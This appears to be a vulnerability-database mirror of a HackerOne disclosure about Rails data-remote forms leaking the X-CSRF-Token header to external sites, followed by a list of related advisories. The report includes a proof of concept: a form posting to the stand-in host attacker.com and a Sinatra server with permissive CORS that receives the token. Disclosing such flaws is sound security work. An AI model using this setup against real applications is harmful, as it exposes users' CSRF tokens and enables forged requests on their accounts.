Lucene search
MastahyetiH1:189878HistoryDec 09, 2016 - 4:27 p.m.
Ruby on Rails: CSRF header is sent to external websites when using data-remote forms
2016-12-0916:27:17
mastahyeti
hackerone.com
11
0.006 Low
EPSS
Percentile
78.9%
Looks like there is a regression in the fix for CVE-2015-1840 (H1 report). The origin isn’t being checked before adding a CSRF header to data-remote forms. I noticed this when checking out the new rails-ujs repo.
Example Rails template:
<%= form_tag "http://attacker.com", remote: true do %>
<button type=submit>submit</button>
<% end %>
Example http://attacker.com app
require "sinatra"
options '/*' do
headers['Access-Control-Allow-Origin'] = "*"
headers['Access-Control-Allow-Methods'] = "POST"
headers['Access-Control-Allow-Headers'] ="x-csrf-token"
end
post '/*' do
"foo"
end
When the form is submitted, an XHR request to attacker.com is sent, including the X-CSRF-Token header.
PS: @tenderlove told me to submit this here. I shouldn’t get paid since I’m one of the GitHub folks who reviews these H1 submissions now.
Related
github
github
CSRF Vulnerability in rails-ujs
2020-07-07 16:34:10
jquery-rails and jquery-ujs subject to Exposure of Sensitive Information
2017-10-24 18:33:36
redhatcve
redhatcve
CVE-2020-8167
2020-06-02 17:53:07
osv
osv
CSRF Vulnerability in rails-ujs
2020-07-07 16:34:10
CVE-2020-8167
2020-06-19 18:15:11
jquery-rails and jquery-ujs subject to Exposure of Sensitive Information
2017-10-24 18:33:36
veracode
veracode
Cross-Site Request Forgery (CSRF)
2020-05-20 00:09:28
debiancve
debiancve
CVE-2020-8167
2020-06-19 18:15:11
CVE-2015-1840
2015-07-26 22:59:00
prion
prion
Cross site request forgery (csrf)
2020-06-19 18:15:00
Design/Logic Flaw
2015-07-26 22:59:00
ubuntucve
ubuntucve
CVE-2020-8167
2020-06-19 00:00:00
CVE-2015-1840
2015-07-26 00:00:00
cvelist
cvelist
CVE-2020-8167
2020-06-19 17:16:06
CVE-2015-1840
2015-07-26 22:00:00
gitlab
gitlab
Cross-Site Request Forgery (CSRF)
2020-06-19 00:00:00
nvd
nvd
CVE-2020-8167
2020-06-19 18:15:11
CVE-2015-1840
2015-07-26 22:59:00
cve
cve
CVE-2020-8167
2020-06-19 18:15:11
CVE-2015-1840
2015-07-26 22:59:00
nessus
nessus
Fedora 22 : rubygem-jquery-rails-3.1.0-3.fc22 (2015-10258)
2015-06-30 00:00:00
openSUSE Security Update : rubygem-jquery-rails (openSUSE-2015-501)
2015-07-20 00:00:00
Fedora 21 : rubygem-jquery-rails-3.1.0-3.fc21 (2015-10144)
2015-06-30 00:00:00
openvas
openvas
Fedora Update for rubygem-jquery-rails FEDORA-2015-10258
2015-07-07 00:00:00
Fedora Update for rubygem-jquery-rails FEDORA-2015-10144
2015-06-30 00:00:00
Ruby on Raily < 5.2.4.3, 6.x < 6.0.3.1 Multiple Vulnerabilities - Windows
2020-06-29 00:00:00
fedora
fedora
[SECURITY] Fedora 21 Update: rubygem-jquery-rails-3.1.0-3.fc21
2015-06-30 00:18:18
[SECURITY] Fedora 22 Update: rubygem-jquery-rails-3.1.0-3.fc22
2015-06-30 00:04:16
nodejs
nodejs
CSRF Vulnerability
2015-10-17 19:41:46
rubygems
rubygems
CSRF Vulnerability in jquery-rails
2015-06-15 21:00:00
CSRF Vulnerability in jquery-ujs
2015-06-15 21:00:00
CSRF Vulnerability in rails-ujs
2020-05-17 21:00:00
freebsd
freebsd
Rails -- multiple vulnerabilities
2020-05-18 00:00:00
rubygem-rails -- multiple vulnerabilities
2015-06-16 00:00:00
debian
debian
[SECURITY] [DSA 4766-1] rails security update
2020-09-24 20:50:38
suse
suse
Security update for rmt-server (important)
2020-11-23 00:00:00
Security update for rmt-server (important)
2020-11-21 00:00:00
redhat
redhat
(RHSA-2021:1313) Moderate: Satellite 6.9 Release
2021-04-21 12:43:38